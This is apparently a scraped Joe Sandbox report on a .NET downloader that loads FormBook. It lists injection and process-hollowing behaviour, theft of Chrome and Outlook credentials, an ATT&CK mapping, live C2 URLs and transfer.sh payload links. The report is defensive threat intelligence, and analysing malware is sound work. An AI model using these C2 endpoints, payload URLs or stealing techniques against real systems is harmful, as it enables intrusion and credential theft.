      Source: Yara matchFile source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API      		Path Interception812
      Process Injection      		1
      Masquerading      		1
      OS Credential Dumping      		121
      Security Software Discovery      		Remote Services1
      Email Collection      		Exfiltration Over Other Network Medium11
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Shared Modules      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools      		LSASS Memory2
      Process Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth3
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
      Virtualization/Sandbox Evasion      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin Shares1
      Data from Local System      		Automated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)812
      Process Injection      		NTDS1
      Remote System Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer115
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common3
      Obfuscated Files or Information      		Cached Domain Credentials13
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 720157 Sample: SecuriteInfo.com.Trojan.Dow... Startdate: 11/10/2022 Architecture: WINDOWS Score: 100 32 www.suatvthainguyen.buzz 2->32 34 suatvthainguyen.buzz 2->34 40 Snort IDS alert for network traffic 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 4 other signatures 2->46 9 SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe 15 3 2->9         started        signatures3 process4 dnsIp5 36 transfer.sh 144.76.136.153, 443, 49699, 49700 HETZNER-ASDE Germany 9->36 24 SecuriteInfo.com.T....3836.25977.exe.log, CSV 9->24 dropped 56 Writes to foreign memory regions 9->56 58 Allocates memory in foreign processes 9->58 60 Injects a PE file into a foreign processes 9->60 62 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->62 14 aspnet_compiler.exe 9->14         started        file6 signatures7 process8 signatures9 64 Modifies the context of a thread in another process (thread injection) 14->64 66 Maps a DLL or memory area into another process 14->66 68 Sample uses process hollowing technique 14->68 70 Queues an APC in another process (thread injection) 14->70 17 explorer.exe 14->17 injected process10 dnsIp11 26 www.skyepattest.com 217.160.0.167, 49711, 49712, 49713 ONEANDONE-ASBrauerstrasse48DE Germany 17->26 28 www.negerbajs.info 69.57.163.50, 49701, 80 FORTRESSITXUS United States 17->28 30 4 other IPs or domains 17->30 38 System process connects to network (likely due to code injection or exploit) 17->38 21 wlanext.exe 13 17->21         started        signatures12 process13 signatures14 48 Tries to steal Mail credentials (via file / registry access) 21->48 50 Tries to harvest and steal browser information (history, passwords, etc) 21->50 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe21%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe10%MetadefenderBrowse
      SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      1.0.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://transfer.sh40%URL Reputationsafe
      http://www.luregirl.net/obc0/0%Avira URL Cloudsafe
      http://www.skyepattest.com/obc0/0%Avira URL Cloudsafe
      http://www.augusta.broker/obc0/?-Zbh98=ymzEQwRFXCPDCi+CRQJb7/Cu/KCeuwmnwGnTOFfe8Wu9oS0w58wfIKm/BUV3lMrC1MN0SKPFf3LORs93kZV7msxn8x5u5Wnabg==&C0=X82hHfExC6QP0%Avira URL Cloudsafe
      http://www.luregirl.net/obc0/?-Zbh98=QEPeK6C4+xU1T+Zv89RyXnFvtkuTgj7CyQVR6lB98YiPEjAwu2VabqstxXG4WeniE5n6fSCr36EXz2ZAkGy4VKLMfvQeNDQPqw==&C0=X82hHfExC6QP0%Avira URL Cloudsafe
      http://www.negerbajs.info/obc0/?-Zbh98=V2kSpVpGpqmsc+zV99/vwEPQm6AjbD0sNlmHlMce7g5oKKN3NgpJQJsKfnUSGJnURE4hRqcigFYsP8mgf+TOZi6v6bw37RqyMQ==&C0=X82hHfExC6QP0%Avira URL Cloudsafe
      https://www.skyepattest.com/obc0/?-Zbh98=7PSH/Ln00kiEZ0%Avira URL Cloudsafe
      http://www.bloopacts.live/obc0/0%Avira URL Cloudsafe
      https://cs.deviceatlas-cdn.com/smartclick0%Avira URL Cloudsafe
      https://cs.deviceatlas-cdn.com/101dacs.js0%Avira URL Cloudsafe
      www.suatvthainguyen.buzz/obc0/0%Avira URL Cloudsafe
      http://www.dzyngiri.com0%Avira URL Cloudsafe
      https://transfer.shD80%Avira URL Cloudsafe
      https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-1010%Avira URL Cloudsafe
      https://www.bandicam.com00%Avira URL Cloudsafe
      http://justinmezzell.com0%Avira URL Cloudsafe
      http://www.augusta.broker/obc0/0%Avira URL Cloudsafe
      https://park.101datacenter.net/css/vendor-1.css?202209080350460%Avira URL Cloudsafe
      http://www.skyepattest.com/obc0/?-Zbh98=7PSH/Ln00kiEZ+8VHNPsGnjemOaV3QQvmjWzLH8ChjGT6OrVSUax7xbhQJ4P9gQznTCEUU1HjkXGkkJ8y3lbGhe/UOddQQeZUw==&C0=X82hHfExC6QP0%Avira URL Cloudsafe
      http://www.bloopacts.live/obc0/?-Zbh98=MMZqO1I08y1GBRfD5BQQX3BCGY/GGPyfy+PmyLieMA7AvKnTbkXoUfvxfVWp1ohOvSFQ0Ck6defUcVisMCvldqUqNSR/syiy4w==&C0=X82hHfExC6QP0%Avira URL Cloudsafe
      https://cs.deviceatlas-cdn.com0%Avira URL Cloudsafe
      https://park.101datacenter.net0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.augusta.broker
      		52.60.87.163
      		truetrue
        		unknown
        suatvthainguyen.buzz
        		198.252.98.107
        		truetrue
          		unknown
          luregirl.net
          		167.179.103.237
          		truetrue
            		unknown
            www.bloopacts.live
            		167.235.29.175
            		truetrue
              		unknown
              www.negerbajs.info
              		69.57.163.50
              		truetrue
                		unknown
                transfer.sh
                		144.76.136.153
                		truefalse
                  		high
                  www.skyepattest.com
                  		217.160.0.167
                  		truetrue
                    		unknown
                    www.luregirl.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.suatvthainguyen.buzz
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.luregirl.net/obc0/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.skyepattest.com/obc0/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.luregirl.net/obc0/?-Zbh98=QEPeK6C4+xU1T+Zv89RyXnFvtkuTgj7CyQVR6lB98YiPEjAwu2VabqstxXG4WeniE5n6fSCr36EXz2ZAkGy4VKLMfvQeNDQPqw==&C0=X82hHfExC6QPtrue
                        • Avira URL Cloud: safe
                        		unknown
                        www.suatvthainguyen.buzz/obc0/true
                        • Avira URL Cloud: safe
                        		low
                        http://www.negerbajs.info/obc0/?-Zbh98=V2kSpVpGpqmsc+zV99/vwEPQm6AjbD0sNlmHlMce7g5oKKN3NgpJQJsKfnUSGJnURE4hRqcigFYsP8mgf+TOZi6v6bw37RqyMQ==&C0=X82hHfExC6QPtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.augusta.broker/obc0/?-Zbh98=ymzEQwRFXCPDCi+CRQJb7/Cu/KCeuwmnwGnTOFfe8Wu9oS0w58wfIKm/BUV3lMrC1MN0SKPFf3LORs93kZV7msxn8x5u5Wnabg==&C0=X82hHfExC6QPtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.augusta.broker/obc0/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.bloopacts.live/obc0/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.bloopacts.live/obc0/?-Zbh98=MMZqO1I08y1GBRfD5BQQX3BCGY/GGPyfy+PmyLieMA7AvKnTbkXoUfvxfVWp1ohOvSFQ0Ck6defUcVisMCvldqUqNSR/syiy4w==&C0=X82hHfExC6QPtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://transfer.sh/get/at0HRq/COOL2.txtfalse
                          		high
                          http://www.skyepattest.com/obc0/?-Zbh98=7PSH/Ln00kiEZ+8VHNPsGnjemOaV3QQvmjWzLH8ChjGT6OrVSUax7xbhQJ4P9gQznTCEUU1HjkXGkkJ8y3lbGhe/UOddQQeZUw==&C0=X82hHfExC6QPtrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://transfer.sh/get/NNwCGT/DLL.txtfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabd01F736L.3.drfalse
                              		high
                              https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_sourcewlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=d01F736L.3.drfalse
                                  		high
                                  https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sourwlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://search.yahoo.com?fr=crmas_sfpfd01F736L.3.drfalse
                                      		high
                                      https://cs.deviceatlas-cdn.com/101dacs.jswlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://transfer.shD8SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314896273.0000000002620000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htmwlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                        		high
                                        http://www.dzyngiri.comwlanext.exe, 00000003.00000002.573349924.0000000003436000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.skyepattest.com/obc0/?-Zbh98=7PSH/Ln00kiEZwlanext.exe, 00000003.00000002.573551014.0000000003A7E000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://justinmezzell.comwlanext.exe, 00000003.00000002.573349924.0000000003436000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_swlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                          		high
                                          https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=auwlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314456233.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.101domain.com/gmail_email_aliases.htmwlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_swlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://park.101datacenter.net/css/vendor-1.css?20220908035046wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.bandicam.com0SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.101domain.com/domain_concierge_service.htm?query=augusta.broker&utm_campaign=parked-pagewlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referrawlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://search.yahoo.com?fr=mainwlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://transfer.sh4SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314742227.0000000002574000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icowlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmp, d01F736L.3.drfalse
                                                          		high
                                                          https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-101wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.101domain.com/resource_center.htmwlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://cs.deviceatlas-cdn.com/smartclickwlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=d01F736L.3.drfalse
                                                              		high
                                                              https://transfer.shSecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314456233.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchd01F736L.3.drfalse
                                                                  		high
                                                                  https://www.101domain.com/external_links.htmwlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cs.deviceatlas-cdn.comwlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=wlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmp, d01F736L.3.drfalse
                                                                      		high
                                                                      https://park.101datacenter.netwlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://search.yahoo.com?fr=main_sfpfwlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=d01F736L.3.drfalse
                                                                          		high
                                                                          https://search.yahoo.com?fr=crmas_sfpd01F736L.3.drfalse
                                                                            		high
                                                                            http://transfer.shSecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314750292.000000000257D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://search.yahoo.com/searchwlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=augusta.broker&utm_wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=d01F736L.3.drfalse
                                                                                    		high
                                                                                    https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_sourcewlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      144.76.136.153
                                                                                      		transfer.shGermany
                                                                                      		24940HETZNER-ASDEfalse
                                                                                      217.160.0.167
                                                                                      		www.skyepattest.comGermany
                                                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                      69.57.163.50
                                                                                      		www.negerbajs.infoUnited States
                                                                                      		25653FORTRESSITXUStrue
                                                                                      52.60.87.163
                                                                                      		www.augusta.brokerUnited States
                                                                                      		16509AMAZON-02UStrue
                                                                                      167.235.29.175
                                                                                      		www.bloopacts.liveUnited States
                                                                                      		3525ALBERTSONSUStrue
                                                                                      167.179.103.237
                                                                                      		luregirl.netUnited States
                                                                                      		20473AS-CHOOPAUStrue

                                                                                      General Information

                                                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                      Analysis ID:720157
                                                                                      Start date and time:2022-10-11 05:54:42 +02:00
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 6s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Sample file name:SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:8
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@4/2@7/6
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 43.3% (good quality ratio 37.7%)
                                                                                      • Quality average: 71.8%
                                                                                      • Quality standard deviation: 33.4%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 107
                                                                                      • Number of non-executed functions: 156
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      05:55:41API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      144.76.136.153PO-AM2207586.xlsxGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/Xszsf2/fgc4.exe
                                                                                      1.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/b02fuU/Ikwtsw_Dlwusohh.jpg
                                                                                      BZfApQSvig.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/mv2A8U/Jpacuhx_Ytbwopcz.png
                                                                                      l5LVNukfQm.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/2bMMvr/Ftqhdpj_Dwbqyzci.jpg
                                                                                      ksuO9C24QH.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
                                                                                      ksuO9C24QH.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/EBgWOR/Jhkgft_Cptucfoi.bmp
                                                                                      86503807.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/Fh5qw1/Yviliqfen.log
                                                                                      24982297.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/7l55ti/Yqheqrnit.png
                                                                                      67259493.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/sP0JXy/12.png
                                                                                      89085041.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/TaUSBQ/Tzdtprkp.log
                                                                                      11286208.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/1KEmBC/Odhxu.jpg
                                                                                      tXDPyCfwcY.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/fvp22f/Aiebe.jpg
                                                                                      4G5k6vDDlx.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/a9xgDe/Gudsp.jpg
                                                                                      81cofLYh1o.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/guc4Cl/Mppvcqd.jpg
                                                                                      SecuriteInfo.com.Trojan.DownloaderNET.322.17731.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/uM4ooB/Xvyspuzxq.png
                                                                                      Hr0Hgb5CWj.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/q9wdd6/Mvuizr.log
                                                                                      3baQS3WUdx.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/IJwL7t/Kkvkby.png
                                                                                      Jnfgs.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/SkEyQd/Jnfgs.png
                                                                                      Cheat_Setup.exeGet hashmaliciousBrowse
                                                                                      • transfer.sh/get/6MBXDe/Srueaakv.png

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      www.bloopacts.liveSecuriteInfo.com.Win32.PWSX-gen.6803.9731.exeGet hashmaliciousBrowse
                                                                                      • 167.235.29.175
                                                                                      DOC-04102022-58454857453739.exeGet hashmaliciousBrowse
                                                                                      • 167.235.29.175
                                                                                      www.negerbajs.infoSecuriteInfo.com.Win32.PWSX-gen.6803.9731.exeGet hashmaliciousBrowse
                                                                                      • 69.57.163.50
                                                                                      DOC-04102022-58454857453739.exeGet hashmaliciousBrowse
                                                                                      • 69.57.163.50
                                                                                      transfer.shSecuriteInfo.com.Trojan.DownloaderNET.346.2603.24761.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      zPy5iNStVs.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      fXsvbNiWbA.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      WorU0yNg1Q.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      TPVmfH41Wp.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      P5W2CyiDlC.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      mABBo9ckP3.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      1F5u1OLUIL.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
